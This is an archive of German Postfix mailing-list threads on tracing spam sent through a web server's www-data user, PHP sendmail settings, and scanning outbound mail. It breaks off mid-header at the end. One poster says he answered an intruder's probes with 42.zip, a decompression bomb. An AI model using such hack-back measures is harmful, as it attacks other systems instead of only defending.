Date: Tue, 4 Aug 2009 18:15:36 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: References: <4A784855.6030705@stefanhoth.de> Message-ID: danke .. den spaß wird ich haben ... da alles ruhig ist und ich die logs nun täglich rotiere, werde ich mal nen tag warten und schauen, obs morgen wirder losgeht ... mir leeren los ist es einfacher ... From thomas at gelf.net Tue Aug 4 18:19:08 2009 From: thomas at gelf.net (Thomas Gelf) Date: Tue, 04 Aug 2009 18:19:08 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: References: <4A784855.6030705@stefanhoth.de> Message-ID: Online-WebService24 - Postfix schrieb: > da alles ruhig ist und ich die logs nun täglich rotiere, Lass mich raten -> das hast bisher nicht? > werde ich mal nen tag warten und schauen, obs morgen wirder losgeht ... Schlechte Strategie - eine Spamwelle über Nacht, und du bist auf allen Blacklists... > mir leeren los ist es einfacher ... tail -n 10000 /var/log/xy.log | grep .. From thomas at kochler.de Tue Aug 4 18:20:25 2009 From: thomas at kochler.de (Thomas Kochler) Date: Tue, 04 Aug 2009 18:20:25 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: References: <4A784855.6030705@stefanhoth.de> Message-ID: <4A785FC9.5060106@kochler.de> Hallo auch, Online-WebService24 - Postfix schrieb: > danke .. den spaß wird ich haben ... ist aber an sich sooo schlimm nicht ... > da alles ruhig ist und ich die logs nun täglich rotiere, > werde ich mal nen tag warten und schauen, obs morgen wirder losgeht ... Du solltest vorher schon aktiv sein, denke ich. > mir leeren los ist es einfacher ... Mit leeren Logs??? Wenn es PHP sein sollte, vielleicht hilft Dir das hier: http://ilia.ws/archives/149-mail-logging-for-PHP.html -- Thomas Kochler thomas at kochler.de http://twitter.com/totalknorke http://total-knorke.de/ http://fotos.total-knorke.de/ http://www.handydaumen.de/ http://www.schuko.net/ From lists at adebahr.de Tue Aug 4 19:12:45 2009 From: lists at adebahr.de (Peter Adebahr) Date: Tue, 4 Aug 2009 19:12:45 +0200 Subject: [Postfixbuch-users] [Pb-u] "Out of Office" - Infomails In-Reply-To: References: Message-ID: <200908041912.45813.lists@adebahr.de> On Mon August 3 2009 15:54, Thomas Gelf wrote: > > - Was fehlt hier noch? Sicher jede Menge, bin schon gespannt! - unterstützung von konfigurationen mit ausschließlich virtuellen usern > Mit liebem Gruß > Thomas Gelf dto. peter From thomas at gelf.net Tue Aug 4 19:37:18 2009 From: thomas at gelf.net (Thomas Gelf) Date: Tue, 04 Aug 2009 19:37:18 +0200 Subject: [Postfixbuch-users] [Pb-u] "Out of Office" - Infomails In-Reply-To: <200908041912.45813.lists@adebahr.de> References: <200908041912.45813.lists@adebahr.de> Message-ID: Peter Adebahr schrieb: > On Mon August 3 2009 15:54, Thomas Gelf wrote: >> - Was fehlt hier noch? Sicher jede Menge, bin schon gespannt! > - unterstützung von konfigurationen mit ausschließlich virtuellen usern Naja - momentan unterstützt das Script nur virtuelle User :-) From thomas at gelf.net Tue Aug 4 20:31:48 2009 From: thomas at gelf.net (Thomas Gelf) Date: Tue, 04 Aug 2009 20:31:48 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: <4A785FC9.5060106@kochler.de> References: <4A784855.6030705@stefanhoth.de> <4A785FC9.5060106@kochler.de> Message-ID: Thomas Kochler schrieb: > Wenn es PHP sein sollte, vielleicht hilft Dir das hier: > http://ilia.ws/archives/149-mail-logging-for-PHP.html Hey, das kannte ich noch nicht! Hab's mir recht euphorisch angesehen, bemerkt, dass es in PHP 5.3 Einzug gefunden hat - und ziemlich enttäuscht feststellen müssen, dass mail.add_x_header und mail.log "nicht ganz optimal" sind: - add_x_header erstellt aktuell noch korrupte Header (im CVS gefixt) - mail.log halte ich für ziemlichen Quatsch. Für's Mail-Log ist der MTA zuständig! Es würde reichen wenn PHP erlauben würde, pro Web einen Sender (Envelope-From) vorzugeben. Und diese Unsitte, jedes Programm seine eigenen Logfiles schreiben zu lassen - ich könnt' aus der Haut fahren! Kostet I/O, lässt sich schwer zentralisieren (bei vielen Servern), muss eigens rotiert werden - WOZU GIBT ES DENN SYSLOG?? Mit add_x_header kann ich mich ja noch anfreunden - dass die dabei über deren eigene perverse "Intelligenz" in mail() bzgl der Zeilenumbrüche gestolpert sind freut mich fast ;-) Und der Rest: war ja schon immer so, in PHP werden Symptome bekämpft, man weigert sich aber strikt, Probleme an der Wurzel anzugehen. Mit liebem Gruß Thomas Gelf PS: Na wenigstens ist mein Zend_Log_Writer_Syslog jetzt ins Zend Framework 1.9.0 aufgenommen worden - ist doch auch was ;-) From driessen at fblan.de Tue Aug 4 21:04:28 2009 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 4 Aug 2009 21:04:28 +0200 Subject: [Postfixbuch-users] =?iso-8859-2?q?Spam_=FCber_www-data?= In-Reply-To: References: <4A784855.6030705@stefanhoth.de> <4A785FC9.5060106@kochler.de> Message-ID: <003401ca1536$63f3a690$0565a8c0@uwe> On Behalf Of Thomas Gelf > Thomas Kochler schrieb: > > Wenn es PHP sein sollte, vielleicht hilft Dir das hier: > > http://ilia.ws/archives/149-mail-logging-for-PHP.html > > Hey, das kannte ich noch nicht! Hab's mir recht euphorisch angesehen, > bemerkt, dass es in PHP 5.3 Einzug gefunden hat - und ziemlich > enttäuscht feststellen müssen, dass mail.add_x_header und mail.log > "nicht ganz optimal" sind: > > - add_x_header erstellt aktuell noch korrupte Header (im CVS gefixt) > > - mail.log halte ich für ziemlichen Quatsch. Für's Mail-Log ist der MTA > zuständig! Es würde reichen wenn PHP erlauben würde, pro Web einen > Sender (Envelope-From) vorzugeben. Und diese Unsitte, jedes Programm > seine eigenen Logfiles schreiben zu lassen - ich könnt' aus der Haut > fahren! Kostet I/O, lässt sich schwer zentralisieren (bei vielen > Servern), muss eigens rotiert werden - WOZU GIBT ES DENN SYSLOG?? > > Mit add_x_header kann ich mich ja noch anfreunden - dass die dabei über > deren eigene perverse "Intelligenz" in mail() bzgl der Zeilenumbrüche > gestolpert sind freut mich fast ;-) Und der Rest: war ja schon immer so, > in PHP werden Symptome bekämpft, man weigert sich aber strikt, Probleme > an der Wurzel anzugehen. > Warum so kompliziert? In den Vhost folgenden Eintrag für jedes Web reinsetzen php_admin_value sendmail_path "/usr/sbin/sendmail -t -i -fnoreply at Domainname.toplevel" und schon sieht man schnell und einfach welches Web die Mails raushaut. In der Main.cf authorized_submit_users = !www-data und kein www-data als Absender kann senden. Für die Zukunft dann sugsesive alle Webs nur noch mit Mail-Userlogin zulassen. Die Erfahrung ist das kaputte Formulare immer wieder besucht und benutzt werden, die Frage ist nicht das sondern nur wann und wie schnell die BL reagieren und man wird nichts mehr los. Über PHP und MYSQL-Injection kann unter Umständen auch schon ein script in den content eingeschleust worden sein. Es ist auf jeden Fall wichtig der Sache auf den Grund zu gehen. Wenn so was festgestellt wird auf keinen Fall blind löschen sondern an sichere Stelle kopieren und analysieren wer da was wie gemacht hat. Beim ersten und letzten der eine bei mir gehostete Seite (joomlakomponente) gehackt hatte habe ich noch 3 Monate später die Eindringversuche feststellen können. Und immer wenn er es getestet hat ob sein versuch erfolgreich war bekam er ein 42.zip zurück*gg Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From thomas at gelf.net Tue Aug 4 21:35:50 2009 From: thomas at gelf.net (Thomas Gelf) Date: Tue, 04 Aug 2009 21:35:50 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: <003401ca1536$63f3a690$0565a8c0@uwe> References: <4A784855.6030705@stefanhoth.de> <4A785FC9.5060106@kochler.de> <003401ca1536$63f3a690$0565a8c0@uwe> Message-ID: Uwe Driessen schrieb: > Warum so kompliziert? > In den Vhost folgenden Eintrag für jedes Web reinsetzen > php_admin_value sendmail_path "/usr/sbin/sendmail -t -i -fnoreply at Domainname.toplevel" Hatten wir schon ;-) https://listi.jpberlin.de/pipermail/postfixbuch-users/2009-August/051012.html Prinzipiell würde es ja reichen - und ich mache es schon ewig so. Früher auf safemode-basierten Systemen mittels php_admin_value und mittlerweile in der php.ini des jeweiligen vHosts (FCGI). sendmail_path kann man zwar nur aus "PHP_INI_SYSTEM" ändern, aber mail() erlaubt bei deaktiviertem safemode (und der sollte ohnehin schon längst eingestampft worden sein) einen 5. Parameter - der dann direkt an sendmail übergeben wird. Hauptgrund: -f erlauben. Bescheuert und riskant? Definitiv. Aber es entspricht der Philosophie von PHP: no risk no fun. Auf jeden Fall: bei zwei -f zählt der letzte. Touché. Lösung? Ein Wrapper-Script für /usr/bin/sendmail wär 'ne Überlegung wert... Nichtsdestotrotz (und wie heute schon geschrieben): bin voll deiner Meinung, sendmail_path ist die beste und schnellste Lösung - wenn auch nicht perfekt. Mit liebem Gruß Thomas Gelf From driessen at fblan.de Wed Aug 5 00:34:50 2009 From: driessen at fblan.de (Uwe Driessen) Date: Wed, 5 Aug 2009 00:34:50 +0200 Subject: [Postfixbuch-users] =?iso-8859-2?q?Spam_=FCber_www-data?= In-Reply-To: References: <4A784855.6030705@stefanhoth.de> <4A785FC9.5060106@kochler.de> <003401ca1536$63f3a690$0565a8c0@uwe> Message-ID: <003801ca1553$c795c2b0$0565a8c0@uwe> On Behalf Of Thomas Gelf > Uwe Driessen schrieb: > > Warum so kompliziert? > > In den Vhost folgenden Eintrag für jedes Web reinsetzen > > php_admin_value sendmail_path "/usr/sbin/sendmail -t -i - > fnoreply at Domainname.toplevel" > > Hatten wir schon ;-) > > https://listi.jpberlin.de/pipermail/postfixbuch-users/2009-August/051012.html > > Prinzipiell würde es ja reichen - und ich mache es schon ewig so. Früher > auf safemode-basierten Systemen mittels php_admin_value und mittlerweile > in der php.ini des jeweiligen vHosts (FCGI). > > sendmail_path kann man zwar nur aus "PHP_INI_SYSTEM" ändern, aber mail() > erlaubt bei deaktiviertem safemode (und der sollte ohnehin schon längst > eingestampft worden sein) einen 5. Parameter - der dann direkt an > sendmail übergeben wird. > > Hauptgrund: -f erlauben. Bescheuert und riskant? Definitiv. Aber es > entspricht der Philosophie von PHP: no risk no fun. Auf jeden Fall: bei > zwei -f zählt der letzte. Touché. Lösung? Ein Wrapper-Script für > /usr/bin/sendmail wär 'ne Überlegung wert... Prinzipiell sollten im Web nur sichere Formulare genutzt werden die die Formulareingaben der User vor der Verarbeitung zu einer Mail auf Gültigkeit prüfen. http://, mehr wie 1 @ in den Eingaben, der Message deuten schon mit hoher Wahrscheinlichkeit auf Spam bzw. Einbruchs- / Mißbrauchsversuch hin. > > Nichtsdestotrotz (und wie heute schon geschrieben): bin voll deiner > Meinung, sendmail_path ist die beste und schnellste Lösung - wenn auch > nicht perfekt. Nobody is perfect das mail von dir hatte ich übersehen. Meinen Kunden empfehle ich auch die Bestätigungsmail an den Absender zu unterbinden damit kommt die Mail zwar beim Webinhaber an aber es werden keine unbeteiligten Dritten tangiert. < Wenn das schuldige Web dann identifiziert wurde, empfehle ich dir > foldenge Policy anzuwenden: erst abschalten, dann Fragen stellen ;-) Die Methode erst schießen und dann nach der Parole fragen finde ich auch gut *gg > > Mit liebem Gruß > Thomas Gelf > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From thomas at gelf.net Wed Aug 5 01:04:42 2009 From: thomas at gelf.net (Thomas Gelf) Date: Wed, 05 Aug 2009 01:04:42 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: <003801ca1553$c795c2b0$0565a8c0@uwe> References: <4A784855.6030705@stefanhoth.de> <4A785FC9.5060106@kochler.de> <003401ca1536$63f3a690$0565a8c0@uwe> <003801ca1553$c795c2b0$0565a8c0@uwe> Message-ID: Uwe Driessen schrieb: > Prinzipiell sollten im Web nur sichere Formulare genutzt werden die die Formulareingaben > der User vor der Verarbeitung zu einer Mail auf Gültigkeit prüfen. Wenn ich mir bloß aussuchen könnte, was unsere Kunden für einen Mist hochladen dürfen... Aber die beauftragen ja Profis für diesen Job. Mir persönlich fehlt tausenden von Webs ehrlich gesagt auch ein wenig der Überblick über den verwendeten Code ;-) Naja, und wir sind noch relativ klein. Aber dennoch gilt: jedes Kunden- web ist grundsätzlich untrusted. Verboten ist alles, was nicht explizit erlaubt ist, Firewall-Regeln schränken die Hosting-Server auch nach außen ein, jedes Web ist ein eigener System-User - und das System muss so sicher sein, dass der Kunde auch als "Profi" mit einem SSH-Login nichts anstellen könnte... Naja, ist Utopie - aber wir tun was im Rahmen unserer Ressourcen möglich ist, jedenfalls versuchen wir's. Zudem: alle Hosting-Server relayen über dedizierte Bulk-Server, direktes SMTP von Hosting-Servern nach außen ist zwar möglich - allerdings dürfen nur wenige neue Verbindungen pro Minute nach außen aufgebaut werden: FW. Ausnahmen? Auf Anfrage. Genehmigung nur nach einem überzeugenden "Ja, ich weiß was ich tue und Ja, ich weiß dass ihr mir sofort den Stecker zieht, wenn ich etwas falsch mache." > Nobody is perfect das mail von dir hatte ich übersehen. Kein Problem :-) > Meinen Kunden empfehle ich auch die Bestätigungsmail an den Absender zu unterbinden damit > kommt die Mail zwar beim Webinhaber an aber es werden keine unbeteiligten Dritten > tangiert. > Die Methode erst schießen und dann nach der Parole fragen finde ich auch gut *gg Besser als mit irgend einer IP auf 'ner Blacklist zu landen ist es auf jeden Fall. Außerdem: dass das entsprechende Web etwas Falsches gemacht hat steht zu diesem Zeitpunkt schon fest. Und Webs die spammen schalte ich sofort ab, damit habe ich kein Problem und auch keine Angst vor etwaigen Klagen. Schließlich schütze ich den Kunden nur vor sich selbst, denn er hat sich in diesem Moment bereits der Mithilfe zu einer Straftat schuldig gemacht. Wenn man ihnen das klipp und klar verklickert, kommen sie gaaanz schnell vom "Ich-verklage-euch-wegen-entgangenen-Gewinns-weil -ihr-meine-Website-abgeschaltet-habt"-Trip wieder runter. Ist wie Poker spielen. Wer überzeugender wirkt, gewinnt. Sicher kann sich bei diesen wirren und kranken Gesetzen (bin hier in Italien, ist noch schlimmer als bei euch) ohnehin keiner sein... Liebe Grüße Thomas Gelf From kai_postfix at fuerstenberg.ws Wed Aug 5 09:55:09 2009 From: kai_postfix at fuerstenberg.ws (=?ISO-8859-1?Q?Kai_F=FCrstenberg?=) Date: Wed, 05 Aug 2009 09:55:09 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: References: <4A784855.6030705@stefanhoth.de> <4A785FC9.5060106@kochler.de> <003401ca1536$63f3a690$0565a8c0@uwe> <003801ca1553$c795c2b0$0565a8c0@uwe> Message-ID: <4A793ADD.6030909@fuerstenberg.ws> Thomas Gelf schrieb am 05.08.2009 01:04: > Aber die beauftragen ja Profis für diesen Job. Gröhl! Profis!?!? Die meisten "Profis", die ihre Dienste anbieten, kriegen noch nicht mal ne ordentliche HTML-Seite mit nem "Hallo Welt" auf die Reihe, also eine _konforme_. Und dann werden einfach irgendwelche fertigen Skripte verwendet und der Kunde ist zufrieden, weil's ja irgendwie funktioniert. Eben einfach ein Formular, php-mail und gut ist. Diese "Profis" scheren sich einen Dreck um Serversicherheit und Spam-Schutz. > Und Webs die spammen schalte ich sofort ab, damit habe ich kein > Problem und auch keine Angst vor etwaigen Klagen. Schließlich schütze > ich den Kunden nur vor sich selbst, denn er hat sich in diesem Moment > bereits der Mithilfe zu einer Straftat schuldig gemacht. Genau: Seite sperren (zumindest das Kontaktformular), Kunden informieren, dann kann er sich mit seinem "Profi" in Verbindung setzen. Das hat dann vielleicht sogar einen gewissen Lerneffekt. -- Kai Fürstenberg PM an: kai at fuerstenberg punkt ws From thomas at gelf.net Wed Aug 5 10:27:30 2009 From: thomas at gelf.net (Thomas Gelf) Date: Wed, 05 Aug 2009 10:27:30 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: <4A793ADD.6030909@fuerstenberg.ws> References: <4A784855.6030705@stefanhoth.de> <4A785FC9.5060106@kochler.de> <003401ca1536$63f3a690$0565a8c0@uwe> <003801ca1553$c795c2b0$0565a8c0@uwe> <4A793ADD.6030909@fuerstenberg.ws> Message-ID: Kai Fürstenberg schrieb: > Genau: Seite sperren (zumindest das Kontaktformular), Kunden > informieren, dann kann er sich mit seinem "Profi" in Verbindung setzen. > Das hat dann vielleicht sogar einen gewissen Lerneffekt. Mein Lieblingssatz in den entsprechenden Vorlagen für diese Zwecke lautet in etwa wie folgt: "Bitte wenden Sie sich für die Behebung des Problems (würde ja am liebsten zynisch 'vertrauensvoll' reinschreiben) an das Unternehmen / die Person, welche(s) für die Wartung Ihres Internet-Auftrittes zuständig ist." Wohl wissend, dass es eine solches kaum geben dürfte ;-) So machen sie sich dann aber wenigstens Gedanken darüber: "Hä? Die setzen voraus, dass das jemand wartet? Und warum haben wir das nicht?" Bringt auch die vielen kleinen Webstudios zum Umdenken, haben sich schon an mich gewandt und mir das Problem erklären wollen: "Ja was soll ich denn machen? Die zahlen einmal die Website, und das war's. Kann denen doch nicht lebenslang alle potentiellen Bugs fixen!?" Antwort: "Na ist doch super - verkauf' denen Wartungsverträge!" Der Vorschlag fand Anklang ;-) So langsam sind wir aber ziemlich OT... From kai_postfix at fuerstenberg.ws Wed Aug 5 10:48:13 2009 From: kai_postfix at fuerstenberg.ws (=?ISO-8859-1?Q?Kai_F=FCrstenberg?=) Date: Wed, 05 Aug 2009 10:48:13 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?OT=3A_Webdesignerfrustdiskussi?= =?iso-8859-1?q?on_-_was=3A_Spam_=FCber_www-data?= In-Reply-To: References: <4A784855.6030705@stefanhoth.de> <4A785FC9.5060106@kochler.de> <003401ca1536$63f3a690$0565a8c0@uwe> <003801ca1553$c795c2b0$0565a8c0@uwe> <4A793ADD.6030909@fuerstenberg.ws> Message-ID: <4A79474D.5070105@fuerstenberg.ws> Thomas Gelf schrieb am 05.08.2009 10:27: > Wohl wissend, dass es eine solches kaum geben dürfte ;-) So machen sie > sich dann aber wenigstens Gedanken darüber: "Hä? Die setzen voraus, dass > das jemand wartet? Und warum haben wir das nicht?" "Wir haben doch schon die ganze Zeit gewartet..." > Bringt auch die vielen kleinen Webstudios zum Umdenken, haben sich > schon an mich gewandt und mir das Problem erklären wollen: "Ja was > soll ich denn machen? Die zahlen einmal die Website, und das war's. > Kann denen doch nicht lebenslang alle potentiellen Bugs fixen!?" > Antwort: "Na ist doch super - verkauf' denen Wartungsverträge!" > Der Vorschlag fand Anklang ;-) Der Vorschlag ist ja auch gut. Viele verkaufen einem auch einfach CM-Systeme. Man denke nur an Typo3, was mal ne schöne Lücke offen hatte. Die wurde zwar zügig gefixt, aber die Seitenbetreiber hat das nicht sonderlich interessiert. ...bis dann mal was ganz anderes auf den Seiten war... > So langsam sind wir aber ziemlich OT... Ich wollte das nur mal loswerden mit den sogenannten "Profis". Man muss vielleicht nicht unbedingt Profi sein, aber halbwegs professionell arbeiten sollte man dennoch. Und da gehört einfach dazu, dass man sich mal Gedanken darüber macht, und nicht einfach nur hinklatscht. Aber Gedanken werden einem ja nicht bezahlt. Dafür bekommt man aber als Kunde dann gute Arbeit, und der Designer muss sich diese Gedanken ja nicht ein zweites mal machen. -- Kai Fürstenberg PM an: kai at fuerstenberg punkt ws From postfix at online-webservice24.de Wed Aug 5 14:18:51 2009 From: postfix at online-webservice24.de (Online-WebService24 - Postfix) Date: Wed, 5 Aug 2009 14:18:51 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: References: <4A784855.6030705@stefanhoth.de> <4A785FC9.5060106@kochler.de> <003401ca1536$63f3a690$0565a8c0@uwe> <003801ca1553$c795c2b0$0565a8c0@uwe> <4A793ADD.6030909@fuerstenberg.ws> Message-ID: ich danke euch für eure tip ... ich schaue auch braf auf die logs, leider ist der zeit ruhe, also weiter schauen und weiter warten ... neine bis gestern sind meine logs noch wöchentlich rotiert worden ... ist im normalfall auch kein prob ... ich habe da ja nen kunden im verdacht, der hat nen profi, der denen nen typo3 eingerichtet und die seite gemacht hat ... denke mal da werd ich mich mal drumm kümmern ... mfg From lists at puersten.de Wed Aug 5 18:30:06 2009 From: lists at puersten.de (=?ISO-8859-15?Q?Oliver_P=FCrsten?=) Date: Wed, 05 Aug 2009 18:30:06 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails Message-ID: <4A79B38E.9030302@puersten.de> Hallo Zusammen, mich würde mal wieder, wie schon so oft, Eure Meinung zu einem Thema interessieren. Diesmal: Das scannen von ausgehenden Emails. Wie haltet Ihr das bei Euch? Scannt Ihr eure Mails ausgehend auch auf SPAM bzw. Viren? Im Grunde ist es ja so das der Mailversand von einer vertrauenswürdigen Quelle statt findet und man ja erstmal davon ausgehen kann das von dort kein SPAM bzw. keine Viren kommen. Zudem macht es ja auch einen Performance Unterschied ob ich die Emails erst noch durch Amavis schicken muss oder postfix sie gleich zustellen kann. Freue mich wie immer auf Eure Meinung und eine schöne große Diskussion zum Thema ! Viele Grüße Oliver From driessen at fblan.de Wed Aug 5 18:40:09 2009 From: driessen at fblan.de (Uwe Driessen) Date: Wed, 5 Aug 2009 18:40:09 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <4A79B38E.9030302@puersten.de> References: <4A79B38E.9030302@puersten.de> Message-ID: <002201ca15eb$6570ce70$0565a8c0@uwe> On Behalf Of Oliver Pürsten > Hallo Zusammen, > Das scannen von ausgehenden Emails. > > Wie haltet Ihr das bei Euch? > Scannt Ihr eure Mails ausgehend auch auf SPAM bzw. Viren? Ja > > Im Grunde ist es ja so das der Mailversand von einer vertrauenswürdigen Quelle > statt findet und man ja erstmal davon ausgehen kann das von dort kein SPAM bzw. > keine Viren kommen. Bist du dir da sicher???? ich lege für keinen meiner Nutzer die Hand ins Feuer. > > Zudem macht es ja auch einen Performance Unterschied ob ich die Emails erst noch > durch Amavis schicken muss oder postfix sie gleich zustellen kann. Nein, benutze 587 und lass erst nach der Einlieferung scannen. Denn wenns der eigene User ist weiß ich wen ich Prügeln muß. > > Freue mich wie immer auf Eure Meinung und > eine schöne große Diskussion zum Thema ! > > Viele Grüße > Oliver Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From p.heinlein at heinlein-support.de Wed Aug 5 18:43:31 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Wed, 5 Aug 2009 18:43:31 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <4A79B38E.9030302@puersten.de> References: <4A79B38E.9030302@puersten.de> Message-ID: <200908051843.31319.p.heinlein@heinlein-support.de> Am Mittwoch, 5. August 2009 schrieb Oliver Pürsten: > Das scannen von ausgehenden Emails. > > Wie haltet Ihr das bei Euch? Natürlich scannen. > Scannt Ihr eure Mails ausgehend auch auf SPAM bzw. Viren? Klar. Will ich anderen zumuten von mir Spam und/oder Viren zu empfangen? Nein. Willst Du von anderen Spam oder Viren bekommen? Auch nein. Ärgerst Du Dich über andere, die Dir Spam und Viren senden? Ja. > Im Grunde ist es ja so das der Mailversand von einer vertrauenswürdigen > Quelle statt findet und man ja erstmal davon ausgehen kann das von dort > kein SPAM bzw. keine Viren kommen. Bitte was? a) Seit wann sind Nutzer vertrauenswürdig? Bitte wie? Bitte was? b) Seit wann ist definitiv (!) ausgeschlossen, daß es einen Virenbefall bei Euch gibt? c) Wieso sollte man also davon ausgehen können, daß von intern nichts kommen kann? d) Und wenn dem so ist: Warum kommen dann immer wieder Spam- und Viren aus Unternehmensnetzwerken wenn das ja gar nicht gehen kann? e) Wenn alle auf der Welt vertrauenswürdig sind -- woher kommt dann eigentlich überhaupt Spam? Aus dem Weltall? > Zudem macht es ja auch einen Performance Unterschied ob ich die Emails > erst noch durch Amavis schicken muss oder postfix sie gleich zustellen > kann. Wenn alle ausgehend filtern würden so müßtest Du den ganzen Aufwand eingehend nicht mehr treiben. > eine schöne große Diskussion zum Thema ! Für mich eine Diskussion die nach 10 Sekunden beendet ist. Wer ausgehend nicht filtert handelt verantwortungs- und rücksichtslos und drückt anderen die Kosten für eingehende Filterung auf, deren Aufwand er ausgehend selbst nicht machen will. Ausnahme: Mails eines Mailinglistensystems mit eingehender Filterung oder eines Mail-Generator-Systems wo ich große Mengen an Mails habe deren Inhalt ich definitiv nur selbst generiert habe. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein  -- Sitz: Berlin From listen at papernet.de Wed Aug 5 18:43:21 2009 From: listen at papernet.de (Matthias Ebner) Date: Wed, 5 Aug 2009 18:43:21 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <4A79B38E.9030302@puersten.de> Message-ID: <001101ca15eb$d8862bd0$0601a8c0@emnpc2> Oliver Pürsten schrieb am Mittwoch, den 5. August: > Wie haltet Ihr das bei Euch? > Scannt Ihr eure Mails ausgehend auch auf SPAM bzw. Viren? Viren ja, SPAM nein. From Ralf.Hildebrandt at charite.de Wed Aug 5 19:00:30 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Wed, 5 Aug 2009 19:00:30 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <4A79B38E.9030302@puersten.de> References: <4A79B38E.9030302@puersten.de> Message-ID: <20090805170030.GB9236@charite.de> * Oliver Pürsten : > Im Grunde ist es ja so das der Mailversand von einer vertrauenswürdigen Quelle > statt findet und man ja erstmal davon ausgehen kann das von dort kein SPAM bzw. > keine Viren kommen. Meine User? Vertrauenswürdig? Buahahahahahahahahahahahaah *Snief* *hust* *ohnmächtigwerd* Vergiss es. Das muss alles gescannt werden, wir haben ein ein paar exorbitante Torfköppe bei denen man sich fragt, ob Sie die Schuhe zubinden können und wie Sie jemals ihren Doktortitel bekommen haben, wenn Sie doch nichtmal mehr als drei Sätze Text lesen können! From jan at chef-ist.net Wed Aug 5 19:05:11 2009 From: jan at chef-ist.net (=?ISO-8859-1?Q?Jan_Kr=FCger?=) Date: Wed, 05 Aug 2009 19:05:11 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <4A79B38E.9030302@puersten.de> References: <4A79B38E.9030302@puersten.de> Message-ID: <4A79BBC7.9050004@chef-ist.net> Oliver Pürsten schrieb: > Wie haltet Ihr das bei Euch? > Scannt Ihr eure Mails ausgehend auch auf SPAM bzw. Viren? Einmal durch Amavis gedrückt. Besser ist das. Kann mich Ralf, Uwe und Peer nur anschließen. Grüße Jan From p.heinlein at heinlein-support.de Wed Aug 5 20:30:50 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Wed, 5 Aug 2009 20:30:50 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga Message-ID: <200908052030.50317.p.heinlein@heinlein-support.de> Hi Ihrs. Wer hält hier eigentlich den Postfach-Mail-Volumen-Rekord? Ich migriere gerade einen Kundenserver und habe es reihenweise mit Postfächern > 15.000 Mails, diversen Mails > 80 MByte zu tun und Trash/Spamfoldern im dicken fünfstelligen Bereich, die bis 2004 zurückreichen. Rekordhalter ist -- soweit ich es sehe -- jemand mit einer 1,7 GByte großen INBOX, > 15.000 Nachrichten in der INBOX und > 30.000 Nachrichten im Spamfilter. Außerdem hat die INBOX Mails mit 120 MByte pro Mail (wie auch immer die da jemals reingekommen sind). Also Exchange-Postfächer > 2 GByte kenne ich ja, aber diese Mailgrößen und diese irre Anzahl von E-Mails ist schon nicht schlecht. Eigentlich mal ein Fall für ein Postfachquartett. So statt Motor und Leistung wie beim Autoquartett geht es nach Anzahl IMAP-Folder: Anzahl Mails gesamt: Anzahl Mails in INBOX: Anzahl Mails in Spam-Folder: Größte E-Mail: Größte Anzahl von AW: AW: AW: AW: AW im Betreff: Einfachstes Passwort: Kompliziertestes Passwort: Anzahl POP3-Logins pro Stunde: Anzahl an "Mail-kam-nicht-an"-Fehlalarmen am Helpdesk: Mann, mann, mann, mann. Ich werde hier gerade gaga. A propos Gaga. Stand da neulich bei einem Auftritt im Backstage so ein aufgetakeltes Etwas mit Body-Guard und Make-Up-Assistenten, die permanent am Etwas rumpuderte, das ganze mit überblondem Haar und dicker Sonnenbrille. Erst dachte ich, die hat sich verkleidet weil's 'ne Karneval-Aufzeichnung auf VIVA war. Aber dann flippte das Teenie-Publikum aus während sie Quark im Studio redete und feierte "Lady Gaga", die ich bis dato noch gar nicht kannte und noch nicht mal zu würdigen weiß. Mann, mann, mann. Ich werd alt. So. Gaga-Gaga-Mode erreicht. imapsync arbeitet sich seit 5 Stunden (!) an einem einzelnen Postfach ab. Das arme imapsync. Tut mir irgendwie leid. Ist ja auch nur ein Perl-Script, das arme Ding. Kein Wunder daß neulich beide Controller des SANs bei diesen Daten Selbstmord begangen haben und simultan abgestürzt sind. Dong. Ende der Durchsage. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein  -- Sitz: Berlin From listen at papernet.de Wed Aug 